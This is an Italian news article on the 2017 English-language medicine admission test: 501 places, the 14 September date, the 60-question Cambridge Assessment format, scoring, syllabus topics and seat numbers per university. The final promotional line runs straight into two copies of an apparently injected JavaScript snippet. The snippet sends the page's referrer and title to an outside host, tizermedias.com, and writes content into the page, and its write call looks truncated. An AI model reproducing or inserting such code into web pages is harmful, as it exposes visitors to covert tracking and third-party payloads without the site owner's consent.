test d'ammissione a Medicina in inglese 2017

Saranno 501 i posti messi a concorso il prossimo 14 settembre, data nella quale si terrà il test d’ammissione a Medicina in inglese 2017. Lo si è appreso con il d.m. 476 del 28 giugno 2017, che è stato appositamente emanato dal MIUR per rendere noto il contingente delle matricole autorizzate per l’anno accademico 2017-2018, insieme alle modalità e agli argomenti della prova di selezione. Rispetto all’anno passato, i numeri sono in salita di 139 unità. Occorre, tuttavia, tenere conto che il totale comprende anche 26 posti destinati al corso di laurea in lingua inglese in Odontoiatria e Protesi dentaria istituito presso l’Università di Siena.

Il momento di avvio del test d’ammissione a Medicina in inglese 2017 varierà a seconda del fuso orario di appartenenza delle sedi nelle quali si svolgerà la prova. Per l’Italia, l’inizio del test scoccherà alle ore 14.00. Per i dettagli relativi alle altre nazioni, si rimanda alla tabella contenuta nel decreto ministeriale.

Così come negli anni precedenti, anche il questionario del test d’ammissione a Medicina in inglese 2017 sarà predisposto dal MIUR in collaborazione con Cambridge Assessment. I candidati si dovranno confrontare con 60 domande a risposta multipla, tra cui occorrerà individuare l’unica corretta tra le cinque opzioni disponibili. Il test conterrà 2 domande di cultura generale, 20 di ragionamento logico, 18 di biologia, 12 di chimica e 8 quelle di fisica e matematica. Il tempo massimo per completare la prova sarà pari a 100 minuti. I criteri di valutazione del test d’ammissione a Medicina in inglese 2017 sono i seguenti: +1,5 punti per ciascuna risposta corretta, -0,4 per ognuna di quelle sbagliate e nessuna variazione di punteggio per quelle non date. Il punteggio massimo che i candidati potranno totalizzare sarà pari a 90.

Il test d’ammissione a Medicina in inglese 2017 proporrà quesiti mirati a verificare la capacità dei candidati di usare correttamente la lingua italiana e completare logicamente un ragionamento, dimostrando anche il possesso di nozioni di cultura generale relative ad argomenti affrontati nel corso degli studi. La sezione di biologia potrà contenere domande relative alla chimica dei viventi, alle interazioni deboli, alle molecole organiche presenti negli organismi e alle loro funzioni, alla cellula e alle strutture cellulari, alla bioenergetica, a riproduzione ed ereditarietà, ad anatomia e fisiologia umane e animali.

Per rispondere correttamente ai quesiti di chimica del test d’ammissione a Medicina in inglese 2017 occorrerà prepararsi su costituzione della materia, struttura dell’atomo, sistema periodico degli elementi, legame chimico, fondamenti di chimica inorganica, reazioni chimiche e stechiometria, soluzioni, ossidazione e riduzione, acidi e basi, fondamenti di chimica organica. Le domande di fisica, invece, potranno riguardare un ventaglio di argomenti che comprende misure, cinematica, dinamica, meccanica dei fluidi, termologia e termodinamica, elettrostatica ed elettrodinamica. Per quanto riguarda la matematica, infine, le domande potranno essere relative a insiemi numerici e algebra, funzioni, geometria, probabilità e statistica.

I posti disponibili per l’a.a. 2017/2018 nei vari atenei:

Humanitas 80

Università Cattolica del Sacro Cuore 20

Università degli Studi di Bari 22

Università degli Studi di Bologna 50

Università degli Studi di Milano 34

Università degli Studi di Milano Bicocca 25

Università degli Studi di Napoli “Federico II” 15

Università degli Studi di Napoli “Luigi Vanvitelli” 8

Università degli Studi di Pavia 60

Università degli Studi di Roma “Tor Vergata” 20

Università degli Studi di Siena (corso di laurea in Odontoiatria e Protesi dentaria) 26

Università degli Studi di Torino 70

Università “La Sapienza” di Roma 35

Università “Vita e Salute San Raffaele” 36

TOTALE 501

Clicca qui ed esercitati per il test d’ammissione a Medicina in inglese 2017 con le simulazioni gratuite di Universita.it(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();